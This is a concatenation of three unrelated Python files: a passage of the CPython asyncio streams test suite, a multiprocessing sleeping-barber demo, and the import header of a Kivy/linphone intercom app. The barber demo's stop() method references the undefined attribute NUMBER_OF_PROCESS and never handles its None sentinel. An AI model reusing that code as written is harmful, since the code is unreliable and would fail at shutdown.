def test_start_unix_server(self):
class MyServer:
def __init__(self, loop, path):
self.server = None
self.loop = loop
self.path = path
async def handle_client(self, client_reader, client_writer):
data = await client_reader.readline()
client_writer.write(data)
await client_writer.drain()
client_writer.close()
await client_writer.wait_closed()
def start(self):
self.server = self.loop.run_until_complete(
asyncio.start_unix_server(self.handle_client,
path=self.path,
loop=self.loop))
def handle_client_callback(self, client_reader, client_writer):
self.loop.create_task(self.handle_client(client_reader,
client_writer))
def start_callback(self):
start = asyncio.start_unix_server(self.handle_client_callback,
path=self.path,
loop=self.loop)
self.server = self.loop.run_until_complete(start)
def stop(self):
if self.server is not None:
self.server.close()
self.loop.run_until_complete(self.server.wait_closed())
self.server = None
async def client(path):
with self.assertWarns(DeprecationWarning):
reader, writer = await asyncio.open_unix_connection(
path, loop=self.loop)
# send a line
writer.write(b"hello world!\n")
# read it back
msgback = await reader.readline()
writer.close()
await writer.wait_closed()
return msgback
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
# test the server variant with a coroutine as client handler
with test_utils.unix_socket_path() as path:
server = MyServer(self.loop, path)
with self.assertWarns(DeprecationWarning):
server.start()
msg = self.loop.run_until_complete(
self.loop.create_task(client(path)))
server.stop()
self.assertEqual(msg, b"hello world!\n")
# test the server variant with a callback as client handler
with test_utils.unix_socket_path() as path:
server = MyServer(self.loop, path)
with self.assertWarns(DeprecationWarning):
server.start_callback()
msg = self.loop.run_until_complete(
self.loop.create_task(client(path)))
server.stop()
self.assertEqual(msg, b"hello world!\n")
self.assertEqual(messages, [])
@unittest.skipIf(sys.platform == 'win32', "Don't have pipes")
def test_read_all_from_pipe_reader(self):
# See asyncio issue 168. This test is derived from the example
# subprocess_attach_read_pipe.py, but we configure the
# Stream's limit so that twice it is less than the size
# of the data writter. Also we must explicitly attach a child
# watcher to the event loop.
code = """\
import os, sys
fd = int(sys.argv[1])
os.write(fd, b'data')
os.close(fd)
"""
rfd, wfd = os.pipe()
args = [sys.executable, '-c', code, str(wfd)]
pipe = open(rfd, 'rb', 0)
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop, limit=1,
_asyncio_internal=True)
protocol = _StreamProtocol(stream, loop=self.loop,
_asyncio_internal=True)
transport, _ = self.loop.run_until_complete(
self.loop.connect_read_pipe(lambda: protocol, pipe))
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
try:
asyncio.set_child_watcher(watcher)
create = asyncio.create_subprocess_exec(
*args,
pass_fds={wfd},
)
proc = self.loop.run_until_complete(create)
self.loop.run_until_complete(proc.wait())
finally:
asyncio.set_child_watcher(None)
os.close(wfd)
data = self.loop.run_until_complete(stream.read(-1))
self.assertEqual(data, b'data')
def test_streamreader_constructor(self):
self.addCleanup(asyncio.set_event_loop, None)
asyncio.set_event_loop(self.loop)
# asyncio issue #184: Ensure that _StreamProtocol constructor
# retrieves the current loop if the loop parameter is not set
reader = asyncio.Stream(mode=asyncio.StreamMode.READ,
_asyncio_internal=True)
self.assertIs(reader._loop, self.loop)
def test_streamreaderprotocol_constructor(self):
self.addCleanup(asyncio.set_event_loop, None)
asyncio.set_event_loop(self.loop)
# asyncio issue #184: Ensure that _StreamProtocol constructor
# retrieves the current loop if the loop parameter is not set
stream = mock.Mock()
protocol = _StreamProtocol(stream, _asyncio_internal=True)
self.assertIs(protocol._loop, self.loop)
def test_drain_raises_deprecated(self):
# See http://bugs.python.org/issue25441
# This test should not use asyncio for the mock server; the
# whole point of the test is to test for a bug in drain()
# where it never gives up the event loop but the socket is
# closed on the server side.
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
q = queue.Queue()
def server():
# Runs in a separate thread.
with socket.create_server(('127.0.0.1', 0)) as sock:
addr = sock.getsockname()
q.put(addr)
clt, _ = sock.accept()
clt.close()
async def client(host, port):
with self.assertWarns(DeprecationWarning):
reader, writer = await asyncio.open_connection(
host, port, loop=self.loop)
while True:
writer.write(b"foo\n")
await writer.drain()
# Start the server thread and wait for it to be listening.
thread = threading.Thread(target=server)
thread.setDaemon(True)
thread.start()
addr = q.get()
# Should not be stuck in an infinite loop.
with self.assertRaises((ConnectionResetError, ConnectionAbortedError,
BrokenPipeError)):
self.loop.run_until_complete(client(*addr))
# Clean up the thread. (Only on success; on failure, it may
# be stuck in accept().)
thread.join()
self.assertEqual([], messages)
def test_drain_raises(self):
# See http://bugs.python.org/issue25441
# This test should not use asyncio for the mock server; the
# whole point of the test is to test for a bug in drain()
# where it never gives up the event loop but the socket is
# closed on the server side.
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
q = queue.Queue()
def server():
# Runs in a separate thread.
with socket.create_server(('localhost', 0)) as sock:
addr = sock.getsockname()
q.put(addr)
clt, _ = sock.accept()
clt.close()
async def client(host, port):
stream = await asyncio.connect(host, port)
while True:
stream.write(b"foo\n")
await stream.drain()
# Start the server thread and wait for it to be listening.
thread = threading.Thread(target=server)
thread.setDaemon(True)
thread.start()
addr = q.get()
# Should not be stuck in an infinite loop.
with self.assertRaises((ConnectionResetError, ConnectionAbortedError,
BrokenPipeError)):
self.loop.run_until_complete(client(*addr))
# Clean up the thread. (Only on success; on failure, it may
# be stuck in accept().)
thread.join()
self.assertEqual([], messages)
def test___repr__(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
self.assertEqual("<Stream mode=StreamMode.READ>", repr(stream))
def test___repr__nondefault_limit(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop, limit=123,
_asyncio_internal=True)
self.assertEqual("<Stream mode=StreamMode.READ limit=123>", repr(stream))
def test___repr__eof(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream._feed_eof()
self.assertEqual("<Stream mode=StreamMode.READ eof>", repr(stream))
def test___repr__data(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream._feed_data(b'data')
self.assertEqual("<Stream mode=StreamMode.READ 4 bytes>", repr(stream))
def test___repr__exception(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
exc = RuntimeError()
stream._set_exception(exc)
self.assertEqual("<Stream mode=StreamMode.READ exception=RuntimeError()>",
repr(stream))
def test___repr__waiter(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream._waiter = self.loop.create_future()
self.assertRegex(
repr(stream),
r"<Stream .+ waiter=<Future pending[\S ]*>>")
stream._waiter.set_result(None)
self.loop.run_until_complete(stream._waiter)
stream._waiter = None
self.assertEqual("<Stream mode=StreamMode.READ>", repr(stream))
def test___repr__transport(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream._transport = mock.Mock()
stream._transport.__repr__ = mock.Mock()
stream._transport.__repr__.return_value = "<Transport>"
self.assertEqual("<Stream mode=StreamMode.READ transport=<Transport>>",
repr(stream))
def test_IncompleteReadError_pickleable(self):
e = asyncio.IncompleteReadError(b'abc', 10)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(pickle_protocol=proto):
e2 = pickle.loads(pickle.dumps(e, protocol=proto))
self.assertEqual(str(e), str(e2))
self.assertEqual(e.partial, e2.partial)
self.assertEqual(e.expected, e2.expected)
def test_LimitOverrunError_pickleable(self):
e = asyncio.LimitOverrunError('message', 10)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(pickle_protocol=proto):
e2 = pickle.loads(pickle.dumps(e, protocol=proto))
self.assertEqual(str(e), str(e2))
self.assertEqual(e.consumed, e2.consumed)
def test_wait_closed_on_close_deprecated(self):
with test_utils.run_test_server() as httpd:
with self.assertWarns(DeprecationWarning):
rd, wr = self.loop.run_until_complete(
asyncio.open_connection(*httpd.address, loop=self.loop))
wr.write(b'GET / HTTP/1.0\r\n\r\n')
f = rd.readline()
data = self.loop.run_until_complete(f)
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
f = rd.read()
data = self.loop.run_until_complete(f)
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
self.assertFalse(wr.is_closing())
wr.close()
self.assertTrue(wr.is_closing())
self.loop.run_until_complete(wr.wait_closed())
def test_wait_closed_on_close(self):
with test_utils.run_test_server() as httpd:
stream = self.loop.run_until_complete(
asyncio.connect(*httpd.address))
stream.write(b'GET / HTTP/1.0\r\n\r\n')
f = stream.readline()
data = self.loop.run_until_complete(f)
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
f = stream.read()
data = self.loop.run_until_complete(f)
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
self.assertFalse(stream.is_closing())
stream.close()
self.assertTrue(stream.is_closing())
self.loop.run_until_complete(stream.wait_closed())
def test_wait_closed_on_close_with_unread_data_deprecated(self):
with test_utils.run_test_server() as httpd:
with self.assertWarns(DeprecationWarning):
rd, wr = self.loop.run_until_complete(
asyncio.open_connection(*httpd.address, loop=self.loop))
wr.write(b'GET / HTTP/1.0\r\n\r\n')
f = rd.readline()
data = self.loop.run_until_complete(f)
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
wr.close()
self.loop.run_until_complete(wr.wait_closed())
def test_wait_closed_on_close_with_unread_data(self):
with test_utils.run_test_server() as httpd:
stream = self.loop.run_until_complete(
asyncio.connect(*httpd.address))
stream.write(b'GET / HTTP/1.0\r\n\r\n')
f = stream.readline()
data = self.loop.run_until_complete(f)
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
stream.close()
self.loop.run_until_complete(stream.wait_closed())
def test_del_stream_before_sock_closing(self):
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
async def test():
with test_utils.run_test_server() as httpd:
stream = await asyncio.connect(*httpd.address)
sock = stream.get_extra_info('socket')
self.assertNotEqual(sock.fileno(), -1)
await stream.write(b'GET / HTTP/1.0\r\n\r\n')
data = await stream.readline()
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
# drop refs to reader/writer
del stream
gc.collect()
# make a chance to close the socket
await asyncio.sleep(0)
self.assertEqual(1, len(messages), messages)
self.assertEqual(sock.fileno(), -1)
self.loop.run_until_complete(test())
self.assertEqual(1, len(messages), messages)
self.assertEqual('An open stream object is being garbage '
'collected; call "stream.close()" explicitly.',
messages[0]['message'])
def test_del_stream_before_connection_made(self):
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
with test_utils.run_test_server() as httpd:
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
pr = _StreamProtocol(stream, loop=self.loop,
_asyncio_internal=True)
del stream
gc.collect()
tr, _ = self.loop.run_until_complete(
self.loop.create_connection(
lambda: pr, *httpd.address))
sock = tr.get_extra_info('socket')
self.assertEqual(sock.fileno(), -1)
self.assertEqual(1, len(messages))
self.assertEqual('An open stream was garbage collected prior to '
'establishing network connection; '
'call "stream.close()" explicitly.',
messages[0]['message'])
def test_async_writer_api(self):
async def inner(httpd):
stream = await asyncio.connect(*httpd.address)
await stream.write(b'GET / HTTP/1.0\r\n\r\n')
data = await stream.readline()
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
data = await stream.read()
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
await stream.close()
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
with test_utils.run_test_server() as httpd:
self.loop.run_until_complete(inner(httpd))
self.assertEqual(messages, [])
def test_async_writer_api_exception_after_close(self):
async def inner(httpd):
stream = await asyncio.connect(*httpd.address)
await stream.write(b'GET / HTTP/1.0\r\n\r\n')
data = await stream.readline()
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
data = await stream.read()
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
stream.close()
with self.assertRaises(ConnectionResetError):
await stream.write(b'data')
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
with test_utils.run_test_server() as httpd:
self.loop.run_until_complete(inner(httpd))
self.assertEqual(messages, [])
def test_eof_feed_when_closing_writer(self):
# See http://bugs.python.org/issue35065
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
with test_utils.run_test_server() as httpd:
with self.assertWarns(DeprecationWarning):
rd, wr = self.loop.run_until_complete(
asyncio.open_connection(*httpd.address,
loop=self.loop))
wr.close()
f = wr.wait_closed()
self.loop.run_until_complete(f)
assert rd.at_eof()
f = rd.read()
data = self.loop.run_until_complete(f)
assert data == b''
self.assertEqual(messages, [])
def test_stream_reader_create_warning(self):
with contextlib.suppress(AttributeError):
del asyncio.StreamReader
with self.assertWarns(DeprecationWarning):
asyncio.StreamReader
def test_stream_writer_create_warning(self):
with contextlib.suppress(AttributeError):
del asyncio.StreamWriter
with self.assertWarns(DeprecationWarning):
asyncio.StreamWriter
def test_stream_reader_forbidden_ops(self):
async def inner():
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
_asyncio_internal=True)
with self.assertRaisesRegex(RuntimeError, "The stream is read-only"):
await stream.write(b'data')
with self.assertRaisesRegex(RuntimeError, "The stream is read-only"):
await stream.writelines([b'data', b'other'])
with self.assertRaisesRegex(RuntimeError, "The stream is read-only"):
stream.write_eof()
with self.assertRaisesRegex(RuntimeError, "The stream is read-only"):
await stream.drain()
self.loop.run_until_complete(inner())
def test_stream_writer_forbidden_ops(self):
async def inner():
stream = asyncio.Stream(mode=asyncio.StreamMode.WRITE,
_asyncio_internal=True)
with self.assertRaisesRegex(RuntimeError, "The stream is write-only"):
stream._feed_data(b'data')
with self.assertRaisesRegex(RuntimeError, "The stream is write-only"):
await stream.readline()
with self.assertRaisesRegex(RuntimeError, "The stream is write-only"):
await stream.readuntil()
with self.assertRaisesRegex(RuntimeError, "The stream is write-only"):
await stream.read()
with self.assertRaisesRegex(RuntimeError, "The stream is write-only"):
await stream.readexactly(10)
with self.assertRaisesRegex(RuntimeError, "The stream is write-only"):
async for chunk in stream:
pass
self.loop.run_until_complete(inner())
def _basetest_connect(self, stream):
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
stream.write(b'GET / HTTP/1.0\r\n\r\n')
f = stream.readline()
data = self.loop.run_until_complete(f)
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
f = stream.read()
data = self.loop.run_until_complete(f)
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
stream.close()
self.loop.run_until_complete(stream.wait_closed())
self.assertEqual([], messages)
def test_connect(self):
with test_utils.run_test_server() as httpd:
stream = self.loop.run_until_complete(
asyncio.connect(*httpd.address))
self.assertFalse(stream.is_server_side())
self._basetest_connect(stream)
@support.skip_unless_bind_unix_socket
def test_connect_unix(self):
with test_utils.run_test_unix_server() as httpd:
stream = self.loop.run_until_complete(
asyncio.connect_unix(httpd.address))
self._basetest_connect(stream)
def test_stream_async_context_manager(self):
async def test(httpd):
stream = await asyncio.connect(*httpd.address)
async with stream:
await stream.write(b'GET / HTTP/1.0\r\n\r\n')
data = await stream.readline()
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
data = await stream.read()
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
self.assertTrue(stream.is_closing())
with test_utils.run_test_server() as httpd:
self.loop.run_until_complete(test(httpd))
def test_connect_async_context_manager(self):
async def test(httpd):
async with asyncio.connect(*httpd.address) as stream:
await stream.write(b'GET / HTTP/1.0\r\n\r\n')
data = await stream.readline()
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
data = await stream.read()
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
self.assertTrue(stream.is_closing())
with test_utils.run_test_server() as httpd:
self.loop.run_until_complete(test(httpd))
@support.skip_unless_bind_unix_socket
def test_connect_unix_async_context_manager(self):
async def test(httpd):
async with asyncio.connect_unix(httpd.address) as stream:
await stream.write(b'GET / HTTP/1.0\r\n\r\n')
data = await stream.readline()
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
data = await stream.read()
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
self.assertTrue(stream.is_closing())
with test_utils.run_test_unix_server() as httpd:
self.loop.run_until_complete(test(httpd))
def test_stream_server(self):
async def handle_client(stream):
self.assertTrue(stream.is_server_side())
data = await stream.readline()
await stream.write(data)
await stream.close()
async def client(srv):
addr = srv.sockets[0].getsockname()
stream = await asyncio.connect(*addr)
# send a line
await stream.write(b"hello world!\n")
# read it back
msgback = await stream.readline()
await stream.close()
self.assertEqual(msgback, b"hello world!\n")
await srv.close()
async def test():
async with asyncio.StreamServer(handle_client, '127.0.0.1', 0) as server:
await server.start_serving()
task = asyncio.create_task(client(server))
with contextlib.suppress(asyncio.CancelledError):
await server.serve_forever()
await task
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
self.loop.run_until_complete(test())
self.assertEqual(messages, [])
@support.skip_unless_bind_unix_socket
def test_unix_stream_server(self):
async def handle_client(stream):
data = await stream.readline()
await stream.write(data)
await stream.close()
async def client(srv):
addr = srv.sockets[0].getsockname()
stream = await asyncio.connect_unix(addr)
# send a line
await stream.write(b"hello world!\n")
# read it back
msgback = await stream.readline()
await stream.close()
self.assertEqual(msgback, b"hello world!\n")
await srv.close()
async def test():
with test_utils.unix_socket_path() as path:
async with asyncio.UnixStreamServer(handle_client, path) as server:
await server.start_serving()
task = asyncio.create_task(client(server))
with contextlib.suppress(asyncio.CancelledError):
await server.serve_forever()
await task
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
self.loop.run_until_complete(test())
self.assertEqual(messages, [])
def test_stream_server_inheritance_forbidden(self):
with self.assertRaises(TypeError):
class MyServer(asyncio.StreamServer):
pass
@support.skip_unless_bind_unix_socket
def test_unix_stream_server_inheritance_forbidden(self):
with self.assertRaises(TypeError):
class MyServer(asyncio.UnixStreamServer):
pass
def test_stream_server_bind(self):
async def handle_client(stream):
await stream.close()
async def test():
srv = asyncio.StreamServer(handle_client, '127.0.0.1', 0)
self.assertFalse(srv.is_bound())
self.assertEqual(0, len(srv.sockets))
await srv.bind()
self.assertTrue(srv.is_bound())
self.assertEqual(1, len(srv.sockets))
await srv.close()
self.assertFalse(srv.is_bound())
self.assertEqual(0, len(srv.sockets))
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
self.loop.run_until_complete(test())
self.assertEqual(messages, [])
def test_stream_server_bind_async_with(self):
async def handle_client(stream):
await stream.close()
async def test():
async with asyncio.StreamServer(handle_client, '127.0.0.1', 0) as srv:
self.assertTrue(srv.is_bound())
self.assertEqual(1, len(srv.sockets))
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
self.loop.run_until_complete(test())
self.assertEqual(messages, [])
def test_stream_server_start_serving(self):
async def handle_client(stream):
await stream.close()
async def test():
async with asyncio.StreamServer(handle_client, '127.0.0.1', 0) as srv:
self.assertFalse(srv.is_serving())
await srv.start_serving()
self.assertTrue(srv.is_serving())
await srv.close()
self.assertFalse(srv.is_serving())
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
self.loop.run_until_complete(test())
self.assertEqual(messages, [])
def test_stream_server_close(self):
server_stream_aborted = False
fut1 = self.loop.create_future()
fut2 = self.loop.create_future()
async def handle_client(stream):
data = await stream.readexactly(4)
self.assertEqual(b'data', data)
fut1.set_result(None)
await fut2
self.assertEqual(b'', await stream.readline())
nonlocal server_stream_aborted
server_stream_aborted = True
async def client(srv):
addr = srv.sockets[0].getsockname()
stream = await asyncio.connect(*addr)
await stream.write(b'data')
await fut2
self.assertEqual(b'', await stream.readline())
await stream.close()
async def test():
async with asyncio.StreamServer(handle_client, '127.0.0.1', 0) as server:
await server.start_serving()
task = asyncio.create_task(client(server))
await fut1
fut2.set_result(None)
await server.close()
await task
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
self.loop.run_until_complete(asyncio.wait_for(test(), 60.0))
self.assertEqual(messages, [])
self.assertTrue(fut1.done())
self.assertTrue(fut2.done())
self.assertTrue(server_stream_aborted)
def test_stream_server_abort(self):
server_stream_aborted = False
fut1 = self.loop.create_future()
fut2 = self.loop.create_future()
async def handle_client(stream):
data = await stream.readexactly(4)
self.assertEqual(b'data', data)
fut1.set_result(None)
await fut2
self.assertEqual(b'', await stream.readline())
nonlocal server_stream_aborted
server_stream_aborted = True
async def client(srv):
addr = srv.sockets[0].getsockname()
stream = await asyncio.connect(*addr)
await stream.write(b'data')
await fut2
self.assertEqual(b'', await stream.readline())
await stream.close()
async def test():
async with asyncio.StreamServer(handle_client, '127.0.0.1', 0) as server:
await server.start_serving()
task = asyncio.create_task(client(server))
await fut1
fut2.set_result(None)
await server.abort()
await task
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
self.loop.run_until_complete(asyncio.wait_for(test(), 60.0))
self.assertEqual(messages, [])
self.assertTrue(fut1.done())
self.assertTrue(fut2.done())
self.assertTrue(server_stream_aborted)
def test_stream_shutdown_hung_task(self):
fut1 = self.loop.create_future()
fut2 = self.loop.create_future()
cancelled = self.loop.create_future()
async def handle_client(stream):
data = await stream.readexactly(4)
self.assertEqual(b'data', data)
fut1.set_result(None)
await fut2
try:
while True:
await asyncio.sleep(0.01)
except asyncio.CancelledError:
cancelled.set_result(None)
raise
async def client(srv):
addr = srv.sockets[0].getsockname()
stream = await asyncio.connect(*addr)
await stream.write(b'data')
await fut2
self.assertEqual(b'', await stream.readline())
await stream.close()
async def test():
async with asyncio.StreamServer(handle_client,
'127.0.0.1',
0,
shutdown_timeout=0.3) as server:
await server.start_serving()
task = asyncio.create_task(client(server))
await fut1
fut2.set_result(None)
await server.close()
await task
await cancelled
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
self.loop.run_until_complete(asyncio.wait_for(test(), 60.0))
self.assertEqual(messages, [])
self.assertTrue(fut1.done())
self.assertTrue(fut2.done())
self.assertTrue(cancelled.done())
def test_stream_shutdown_hung_task_prevents_cancellation(self):
fut1 = self.loop.create_future()
fut2 = self.loop.create_future()
cancelled = self.loop.create_future()
do_handle_client = True
async def handle_client(stream):
data = await stream.readexactly(4)
self.assertEqual(b'data', data)
fut1.set_result(None)
await fut2
while do_handle_client:
with contextlib.suppress(asyncio.CancelledError):
await asyncio.sleep(0.01)
cancelled.set_result(None)
async def client(srv):
addr = srv.sockets[0].getsockname()
stream = await asyncio.connect(*addr)
await stream.write(b'data')
await fut2
self.assertEqual(b'', await stream.readline())
await stream.close()
async def test():
async with asyncio.StreamServer(handle_client,
'127.0.0.1',
0,
shutdown_timeout=0.3) as server:
await server.start_serving()
task = asyncio.create_task(client(server))
await fut1
fut2.set_result(None)
await server.close()
nonlocal do_handle_client
do_handle_client = False
await task
await cancelled
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
self.loop.run_until_complete(asyncio.wait_for(test(), 60.0))
self.assertEqual(1, len(messages))
self.assertRegex(messages[0]['message'],
"<Task pending .+ ignored cancellation request")
self.assertTrue(fut1.done())
self.assertTrue(fut2.done())
self.assertTrue(cancelled.done())
def test_sendfile(self):
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
with open(support.TESTFN, 'wb') as fp:
fp.write(b'data\n')
self.addCleanup(support.unlink, support.TESTFN)
async def serve_callback(stream):
data = await stream.readline()
await stream.write(b'ack-' + data)
data = await stream.readline()
await stream.write(b'ack-' + data)
data = await stream.readline()
await stream.write(b'ack-' + data)
await stream.close()
async def do_connect(host, port):
stream = await asyncio.connect(host, port)
await stream.write(b'begin\n')
data = await stream.readline()
self.assertEqual(b'ack-begin\n', data)
with open(support.TESTFN, 'rb') as fp:
await stream.sendfile(fp)
data = await stream.readline()
self.assertEqual(b'ack-data\n', data)
await stream.write(b'end\n')
data = await stream.readline()
self.assertEqual(data, b'ack-end\n')
await stream.close()
async def test():
async with asyncio.StreamServer(serve_callback, '127.0.0.1', 0) as srv:
await srv.start_serving()
await do_connect(*srv.sockets[0].getsockname())
self.loop.run_until_complete(test())
self.assertEqual([], messages)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_connect_start_tls(self):
with test_utils.run_test_server(use_ssl=True) as httpd:
# connect without SSL but upgrade to TLS just after
# connection is established
stream = self.loop.run_until_complete(
asyncio.connect(*httpd.address))
self.loop.run_until_complete(
stream.start_tls(
sslcontext=test_utils.dummy_ssl_context()))
self._basetest_connect(stream)
def test_repr_unbound(self):
async def serve(stream):
pass
async def test():
srv = asyncio.StreamServer(serve)
self.assertEqual('<StreamServer>', repr(srv))
await srv.close()
self.loop.run_until_complete(test())
def test_repr_bound(self):
async def serve(stream):
pass
async def test():
srv = asyncio.StreamServer(serve, '127.0.0.1', 0)
await srv.bind()
self.assertRegex(repr(srv), r'<StreamServer sockets=\(.+\)>')
await srv.close()
self.loop.run_until_complete(test())
def test_repr_serving(self):
async def serve(stream):
pass
async def test():
srv = asyncio.StreamServer(serve, '127.0.0.1', 0)
await srv.start_serving()
self.assertRegex(repr(srv), r'<StreamServer serving sockets=\(.+\)>')
await srv.close()
self.loop.run_until_complete(test())
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_read_pipe(self):
async def test():
rpipe, wpipe = os.pipe()
pipeobj = io.open(rpipe, 'rb', 1024)
async with asyncio.connect_read_pipe(pipeobj) as stream:
self.assertEqual(stream.mode, asyncio.StreamMode.READ)
os.write(wpipe, b'1')
data = await stream.readexactly(1)
self.assertEqual(data, b'1')
os.write(wpipe, b'2345')
data = await stream.readexactly(4)
self.assertEqual(data, b'2345')
os.close(wpipe)
self.loop.run_until_complete(test())
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe(self):
async def test():
rpipe, wpipe = os.pipe()
pipeobj = io.open(wpipe, 'wb', 1024)
async with asyncio.connect_write_pipe(pipeobj) as stream:
self.assertEqual(stream.mode, asyncio.StreamMode.WRITE)
await stream.write(b'1')
data = os.read(rpipe, 1024)
self.assertEqual(data, b'1')
await stream.write(b'2345')
data = os.read(rpipe, 1024)
self.assertEqual(data, b'2345')
os.close(rpipe)
self.loop.run_until_complete(test())
def test_stream_ctor_forbidden(self):
with self.assertRaisesRegex(RuntimeError,
"should be instantiated "
"by asyncio internals only"):
asyncio.Stream(asyncio.StreamMode.READWRITE)
def test_deprecated_methods(self):
async def f():
return asyncio.Stream(mode=asyncio.StreamMode.READWRITE,
_asyncio_internal=True)
stream = self.loop.run_until_complete(f())
tr = mock.Mock()
with self.assertWarns(DeprecationWarning):
stream.set_transport(tr)
with self.assertWarns(DeprecationWarning):
stream.transport is tr
with self.assertWarns(DeprecationWarning):
stream.feed_data(b'data')
with self.assertWarns(DeprecationWarning):
stream.feed_eof()
with self.assertWarns(DeprecationWarning):
stream.set_exception(ConnectionResetError("test"))
if __name__ == '__main__':
unittest.main()
|
barberProblem.py | import threading
import time
import random
from multiprocessing import Process, Queue, cpu_count
def barber(queue):
while True:
queue.get()
print("Barber is cutting hair")
time.sleep(random.randint(10, 25)) # Hair cut time
def customer(queue):
while True:
print("Customer in waiting room")
queue.put('Work')
time.sleep(random.randint(1, 3)) # wait for new customer to come in
class Manager:
def __init__(self):
self.queue = Queue()
self.NUMBER_OF_PROCESSES = cpu_count()
def start(self):
self.workers = [Process(target=barber, args=(self.queue,)) for i in range(self.NUMBER_OF_PROCESSES)]
for w in self.workers:
w.start()
customer(self.queue)
def stop(self):
self.queue.put(None)
for i in range(self.NUMBER_OF_PROCESS):
self.workers[i].join()
self.queue.close()
Manager().start() |
ollosipX1.py |
#from os import environ
#environ['SDL_VIDEO_ALLOW_SCREENSAVER']='1'
#from kivy.config import Config
#Config.set('graphics', 'fullscreen', 'auto')
#Config.set('graphics', 'allow_screensaver', '0')
import kivy
from kivy.config import ConfigParser
from kivy.config import Config
from kivy.core.image import Image as CoreImage
config = ConfigParser()
config.read('ollosip.ini')
#'dock' activa o teclado na parte inferior
#systemandmulti activa o teclado nunha venta flotante que podemos mover
Config.set('kivy', 'keyboard_mode', 'systemanddock')
from kivy.app import App
from kivy.event import EventDispatcher
from kivy.uix.widget import Widget
from kivy.uix.button import Button
from kivy.uix.togglebutton import ToggleButton
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.anchorlayout import AnchorLayout
from kivy.uix.floatlayout import FloatLayout
from kivy.uix.gridlayout import GridLayout
from kivy.uix.relativelayout import RelativeLayout
from kivy.uix.scatterlayout import ScatterLayout
from kivy.uix.effectwidget import EffectWidget
from kivy.uix.slider import Slider
from kivy.uix.label import Label
from kivy.uix.popup import Popup
from kivy.uix.image import Image
from kivy.animation import Animation
from kivy.animation import AnimationTransition
from kivy.properties import StringProperty,BooleanProperty,NumericProperty,ListProperty,ObjectProperty,DictProperty
from kivy.core.image import Image as CoreImage
from kivy.clock import Clock
from collections import deque
from kivy.uix.settings import SettingsWithTabbedPanel,SettingsWithSpinner,SettingsWithSidebar
from kivy.logger import Logger
from kivy.clock import Clock
from kivy.core.audio import SoundLoader
from kivy.graphics import Color, Rectangle,Line
from kivy.uix.behaviors import ButtonBehavior,ToggleButtonBehavior
from kivy.uix.image import Image as kivyImage
from kivy.core.audio import SoundLoader
from kivy.uix.screenmanager import Screen, ScreenManager,WipeTransition,FadeTransition,FallOutTransition,RiseInTransition,SwapTransition
from kivy.uix.textinput import TextInput
from kivy.uix.settings import Settings
from kivy.lang import Builder
import os
import re
import fileinput
import threading
from threading import Thread
import io
import urllib
import struct
import datetime
import signal
import socket
from ctypes import *
from functools import partial
import linphone
from digitalclock import DigitalClock
from volumen_rect import VolumenRect
